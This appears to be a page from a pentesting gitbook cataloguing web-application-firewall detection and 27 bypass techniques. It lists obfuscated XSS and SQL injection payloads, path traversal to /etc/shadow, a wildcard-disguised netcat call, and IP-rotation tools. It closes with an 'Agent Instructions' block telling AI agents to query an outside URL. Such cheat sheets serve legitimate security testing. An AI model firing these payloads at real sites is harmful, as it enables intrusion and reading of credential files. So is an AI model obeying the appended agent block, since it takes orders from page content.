# WAF Bypass

If WAF present , You will be blocked by visiting url like, [https://example.com/?p4yl04d3=\<script>alert(document.cookie)\</script>](https://example.com/?p4yl04d3=<script>alert\(document.cookie\)</script>)

## Detection Methods

* **Signature-based Detection:** Matches incoming traffic against known attack patterns.
* **Behavioral Analysis:** Observes traffic behavior for anomalies that may indicate an attack.
* **Rule-based Detection:** Applies predefined rules to block suspicious activity.

## Identifying

1. HTTP Response Headers

```
Server, X-Powered-By, or X-Security
```

2. Error Messages&#x20;
3. Behavioral Analysis

## Tools for Identify

1. wafw00f
2. whatwaf
3. nmap&#x20;

```bash
nmap --script=http-waf-fingerprint,http-waf-detect -p443 example.com
```

## Obfuscation Technique

### 1. URL Encoding

Original payload: `'<script>alert("XSS")</script>'`

URL-encoded: `'%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E`

### 2. Double Encoding

Double-encoded payload: `'%252F%252Fmalicious.com'`

### 3. Unicode Encoding

Unicode for `<script>`: `'\u003Cscript\u003E'\`

Unicode for  `prompt()` : `\u0070r\u06f\u006dpt()`

Unicode for  `../../etc/shadow`  :  `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow`

### 4. Base64 Encoding

Original payload: `'<img src=x onerror=alert(1)>'`

Base64-encoded: `'<img src=x onerror=Y29uc29sZS5sb2cuYWxlcnQoMSk+'`

### 5. Hex Encoding

Hex-encoded payload: `'%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E'`

### 6. Chunked Encoding

Use Chunked Transfer Encoding to split malicious payloads into multiple chunks.

### 7. HTTP/2 and HTTP/3 Features

Use HPACK compression to obfuscate header fields and potentially bypass simpler WAF filters.

### 8. HTTP Parameter Pollution

Payload: `?id=1&id=2`

### 9. HTTP Header Injection

```http
X-Orginal-URL: 
X-Rewrite-URL: 
X-Forwarded-For: 
Referer: 
X-Forwarded-Host: 
X-Host: 
X-Originating-IP: 
X-Remote-IP: 
X-Client-IP: 
X-Remote-Addr: 
```

### 10. Time-Based Attacks

Employ Blind SQL Injection with timing to deduce vulnerabilities based on response times.

### 11. Out-of-Band Techniques

Implement DNS Exfiltration by causing the server to make DNS requests to an attacker-controlled domain.

### 12. SQL Injection Obfuscation

Original SQL payload: `' OR 1=1 --`

Obfuscated payload: `' OR 1 /*comment*/ = 1 --`

### 13. Cross-Site Scripting Obfuscation

Original XSS payload: `'<script>alert(1)</script>'`

Obfuscated payload: `'<s%63ript>alert(1)</s%63ript>'`

### 14. Comment technique&#x20;

```
<!--><script>confirm/**/()/**/</script>
/?id=1+un/**/ion+sel/**/ect+1,2--
```

### 15. Wildcard Obfuscation Technique

&#x20;`/etc/passwd`  :   `/???/??ss??`

`/bin/nc 127.0.0.1 443`  :    `/???/n? 2130706433 443`

### 16. Junk Characters

```html
<script>+-+-1-+-+confirm()</script>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
```

### 17. Line Breaks

```html
<iframe
src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(hac
ker)">
```

### 18. Uninitialized Variables

```bash
/bin/cat$u /etc/shadow$u
```

### 19. Tabs and Line Feeds

```html
<IMG SRC=" javascript:confirm();">
<IMG SRC=" jav ascri pt:confirm ();">
```

### 20. Charset

modifying the `Content-Type` header to use a different charset (e.g. `ibm500`).

**Python code for IBM500 encoding:**

```bash
$ python3
-- snip --
>>> import urllib.parse
>>> s = '<script>alert("xss")</script>'
>>> urllib.parse.quote_plus(s.encode("IBM037"))
'L%A2%83%99%89%97%A3n%81%93%85%99%A3M%7F%A7%A2%A2%7F%5DLa%A2%83%99%89%97%A3n'
```

**Encoded payload:**

```http
POST /comment/post HTTP/1.1
Host: chatapp
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 74

%A2%83%99%89%97%A3n%81%93%85%99%A3M%7F%A7%A2%A2%7F%5DLa%A2%83%99%89%97%A3
```

### 21. Content Size

In some cloud-based WAFs, the request won’t be checked if the payload exceeds a certain size. In these scenarios, it is possible to bypass the firewall by increasing the size of the request body or URL.

### 22. Unicode Compatibility

* <https://shahidulandshamim.gitbook.io/web-application/exploitation/unicode-injection-and-weaponising>
* <https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2#4.Unicode%20Compatibility>

### 23. IP Rotation

* <https://github.com/ustayready/fireprox>: Generate an API gateway URL to by used with ffuf
* <https://github.com/rootcathacking/catspin>: Similar to fireprox
* <https://github.com/PortSwigger/ip-rotate>: Burp Suite plugin that uses API gateway IPs
* <https://github.com/fyoorer/ShadowClone>: A dynamically determined number of container instances are activated based on the input file size and split factor, with the input split into chunks for parallel execution, such as 100 instances processing 100 chunks from a 10,000-line input file with a split factor of 100 lines.

### 24. HTML Encoding

```
&lt;script&gt;alert(1)&lt;/script&gt;
```

### 25. String Concatenation

```
'SEL' + 'ECT'
```

### 26. Case Manipulation

`<script>` :  `<sCRiPt>`

`SELECT` :  `sEleCt`

### 27. H2C Smuggling

## Resources

* <https://github.com/0xInfection/Awesome-WAF>
* <https://medium.com/@bootstrapsecurity/how-to-bypass-web-application-firewalls-10cec76e8276>
* <https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shahidulandshamim.gitbook.io/web-application/scanning-and-uncategorized-items/waf-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.